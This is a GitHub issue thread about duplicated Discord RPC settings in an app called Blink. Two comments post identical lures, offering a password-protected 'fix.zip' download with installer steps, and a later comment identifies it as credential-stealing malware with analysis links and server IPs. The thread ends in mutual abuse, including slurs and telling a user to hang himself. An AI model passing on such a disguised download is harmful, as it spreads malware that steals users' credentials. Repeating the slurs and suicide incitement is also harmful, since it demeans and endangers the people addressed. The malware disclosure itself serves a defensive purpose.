### ISSUE TITLE
Multiple Selections For Discord RPC

### ISSUE THREAD

**Issue by nxllxvxxd** [prayag17/Blink#376]
When you go into settings to enable discord rpc the option is there a bunch of times

Reproduce:
Go to settings, general and it is there

![image](https://github.com/user-attachments/assets/68d9cd01-5dff-45a4-8955-1cd253748700)
From Windows 11 latest dev build

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by prayag17** [comment]
Those options are just a test and are not functional as indicated by option description

**Comment by nxllxvxxd** [comment]
i mean then maybe don't add them to the newest release? kinda dumb to do imo, especially that noticable of a fuckup idk how you missed it

**Comment by prayag17** [comment]
Those options are already removed in new dev builds

**Comment by Alexander-Wilms** [comment]
@nxllxvxxd aka @Lxx-c aka @Superming997 aka @JONTY650413 aka @pilot5657 aka @seeronline aka @GendiAstaNugraha is a Russian criminal spreading the [trojan.stelpak/msil](https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:stelpak%20AND%20engines:msil%20AND%20engines:pwsx) malware stealing credentials for Discord, Telegram, Opera, Steam etc., communicating with via IPs it gets from Telegram and Steam account names.

https://web.archive.org/web/20240826070247/https://github.com/vcmi/vcmi/issues/4514
https://www.google.com/search?hl=en&q=https%3A%2F%2Fwww.mediafire.com%2Ffile%2Fzch0v8rj7200mbm%2Ffix.zip%2Ffile
https://web.archive.org/web/20240826044307/https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
https://any.run/report/086b76e06aece7469bdf3f50de728af0d1f05e5cbd6efd9c057b1383329edd34/18c522f2-8329-4856-993a-0dadb52d3700

The last link shows that the malware seems to get the IPs of the malware author's server from the Telegram profile https://t.me/jamelwt and the Steam profile https://steamcommunity.com/profiles/76561199761128941

The IPs are:
116.203.10.69
147.45.68.138

**Comment by nxllxvxxd** [comment]
> @nxllxvxxd aka @Lxx-c aka @Superming997 aka @JONTY650413 aka @pilot5657 aka @seeronline aka @GendiAstaNugraha is a Russian criminal spreading the [trojan.stelpak/msil](https://www.virustotal.com/gui/search/engines:trojan%20AND%20engines:stelpak%20AND%20engines:msil%20AND%20engines:pwsx) malware stealing credentials for Discord, Telegram, Opera, Steam etc., communicating with via IPs it gets from Telegram and Steam account names.
> 
> https://web.archive.org/web/20240826153534/https://github.com/element-plus/element-plus/issues/18019 https://web.archive.org/web/20240826070247/https://github.com/vcmi/vcmi/issues/4514 https://www.google.com/search?hl=en&q=https%3A%2F%2Fwww.mediafire.com%2Ffile%2Fzch0v8rj7200mbm%2Ffix.zip%2Ffile https://web.archive.org/web/20240826044307/https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file https://any.run/report/086b76e06aece7469bdf3f50de728af0d1f05e5cbd6efd9c057b1383329edd34/18c522f2-8329-4856-993a-0dadb52d3700
> 
> The last link shows that the malware seems to get the IPs of the malware author's server from the Telegram profile https://t.me/jamelwt and the Steam profile https://steamcommunity.com/profiles/76561199761128941
> 
> The IPs are: 116.203.10.69 147.45.68.138

number 1 I am not the person doing it, number two i just found out my account got compromised less than an hour ago and am trying as hard as i can to find all posts made by whoever comprised my account to tell them not to click the link. i am not any of those other people take a few seconds to look at my account I have had this for years and genuinely use github

**Comment by Alexander-Wilms** [comment]
@nxllxvxxd Hang yourself, you subhuman retard, who is either a Russian thug or a single-digit IQ individual too moronic to secure his accounts.

**Comment by nxllxvxxd** [comment]
> @nxllxvxxd Hang yourself, you subhuman retard, who is either a Russian thug or a single-digit IQ individual too moronic to secure his accounts.

Jump off a bridge you fuckin dipshit, I have both 2FA and passkey enabled as well as a 10+ character long password, you're just a cringe internet idiot. look through my account anything seem russian to you?

Wow look a repo I made over 6 years ago in pure English: [https://github.com/nxllxvxxd/Microsoft-Rewards-Auto-Search-Scripts](https://github.com/nxllxvxxd/Microsoft-Rewards-Auto-Search-Scripts)

Get a grip on reality and learn these things happen, in case you don't keep up with the news almost everyone in the US had their Social Security number leaked, nothing is secure you absolute troglodyte
